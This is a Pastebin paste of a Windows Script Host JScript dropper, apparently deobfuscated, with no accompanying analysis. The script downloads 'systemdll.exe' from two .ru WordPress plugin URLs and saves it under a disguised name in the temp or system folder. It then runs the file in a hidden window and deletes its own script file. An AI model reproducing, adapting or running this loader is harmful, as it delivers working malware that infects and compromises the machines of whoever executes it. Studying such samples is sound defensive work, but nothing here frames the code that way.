Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function get_system_folder_path(scripting_file_system_object) {
- var system_folder_path = "",
- ws_network_object = WScript["CreateObject"]("WScript.Network");
- /*
- index=0, WindowsFolder, the windows folder contains files installed by the Windows operating system.
- index=1, SystemFolder, the system folder contains libraries, fonts, and device drivers.
- index=2, TemporaryFolder, the temp folder is used to store temporary files. Its path is found in the TMP environment variable.
- */
- if (typeof ws_network_object["UserDomain"] == "string") {
- system_folder_path = scripting_file_system_object["GetSpecialFolder"](2);
- } else {
- system_folder_path = scripting_file_system_object["GetSpecialFolder"](1);
- }
- return system_folder_path;
- }
- function load_and_execute_file(link_to_file) {
- var WScript = WScript;
- var ActiveXObject = ActiveXObject;
- var msxml2_xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
- var scripting_file_system_object = new ActiveXObject("Scripting.FileSystemObject");
- msxml2_xmlhttp["open"]("GET", link_to_file, 0);
- try {
- msxml2_xmlhttp.send();
- } catch (error) {
- return false;
- }
- if (msxml2_xmlhttp["Status"] == 200) {
- var adodb_stream = new ActiveXObject("ADODB.Stream");
- var masked_file_path = get_system_folder_path(scripting_file_system_object) + "not";
- adodb_stream["Open"]();
- adodb_stream["Type"] = 1;
- var response_body = msxml2_xmlhttp["ResponseBody"];
- adodb_stream["Write"](response_body);
- adodb_stream["Position"] = 0;
- adodb_stream["SaveToFile"](masked_file_path);
- adodb_stream["Close"]();
- var command = "cmd.exe /c " + masked_file_path;
- var WScript_shell = new ActiveXObject("Wscript.Shell");
- WScript_shell["run"](command, 25);
- scripting_file_system_object["deleteFile"](WScript["ScriptFullName"]);
- return true;
- } else {
- return false;
- }
- return true;
- }
- if (typeof WScript.Echo == "unknown") {
- var links_to_files = [
- "http://resog.ru/wp-content/plugins/libravatar-replace/systemdll.exe",
- "http://sdng.ru/wp-content/plugins/libravatar-replace/systemdll.exe"
- },
- file_loaded_and_executed = false,
- scripts_to_process = 2,
- scripts_processed = 0;
- while (!file_loaded_and_executed) {
- file_loaded_and_executed = load_and_execute_file(links_to_files[scripts_processed]);
- scripts_processed++;
- if (scripts_processed == scripts_to_process) {
- break;
- }
- }
- }
Add Comment
Please, Sign In to add comment